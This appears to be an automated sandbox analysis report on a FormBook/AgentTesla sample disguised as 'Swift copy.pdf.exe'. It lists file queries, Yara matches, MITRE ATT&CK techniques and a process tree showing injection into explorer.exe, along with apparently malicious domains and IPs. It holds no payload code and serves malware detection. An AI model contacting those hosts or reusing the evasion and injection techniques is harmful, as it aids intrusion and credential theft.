          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.590975856.00000000000F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.352591073.000000000393F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.389845019.0000000000F80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 5.2.Swift copy.pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.Swift copy.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.590975856.00000000000F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.352591073.000000000393F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.389845019.0000000000F80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 5.2.Swift copy.pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.Swift copy.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          The matrix is reproduced here one tactic per line (the original is a 14-column grid). Bracketed digits are the superscript signature counts shown next to a technique in the original matrix, copied as they appear; techniques without brackets are the matrix's standard placeholders and were not observed for this sample.

          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
          Execution: Shared Modules [1]; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task
          Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
          Privilege Escalation: Process Injection [612]; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
          Defense Evasion: Masquerading [21]; Disable or Modify Tools [1]; Virtualization/Sandbox Evasion [31]; Process Injection [612]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [14]; Software Packing [3]
          Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
          Discovery: Security Software Discovery [221]; Process Discovery [2]; Virtualization/Sandbox Evasion [31]; Remote System Discovery [1]; System Information Discovery [112]; System Owner/User Discovery; Network Sniffing
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
          Collection: Archive Collected Data [1]; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
          Command and Control: Encrypted Channel [1]; Ingress Tool Transfer [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [12]; Fallback Channels; Multiband Communication; Commonly Used Port
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features
          Impact: Modify System Partition; Device Lockout; Delete Device Data; Data Encrypted for Impact

          Behavior Graph

          Behavior Graph ID: 385261, Sample: Swift copy.pdf.exe, Startdate: 12/04/2021, Architecture: WINDOWS, Score: 100

          Sample-level nodes: DNS/IP www.marktheoilguy.com, marktheoilguy.com; signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules), Found malware configuration, Malicious sample detected (through community Yara rule), 10 other signatures

          Process tree reconstructed from the graph:

          • Swift copy.pdf.exe (started)
            • Created file: C:\Users\user\...\Swift copy.pdf.exe.log, ASCII (dropped)
            • Signature: Injects a PE file into a foreign processes
            • Swift copy.pdf.exe (started; a second child instance of Swift copy.pdf.exe is also started)
              • Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
              • explorer.exe (injected)
                • DNS/IP: www.stepmed.life 5.101.123.53, 80, PAGM-ASEE Estonia; agenciaorange.net 51.222.80.112, 49753, 80, OVHFR France; 10 other IPs or domains
                • Signatures: System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation
                • cscript.exe (started)
                  • DNS/IP: www.stepmed.life
                  • Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                  • cmd.exe (started)
                    • conhost.exe (started)
                • autoconv.exe (started)

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          Swift copy.pdf.exe | 31% | Virustotal |
          Swift copy.pdf.exe | 21% | ReversingLabs | Win32.Trojan.AgentTesla
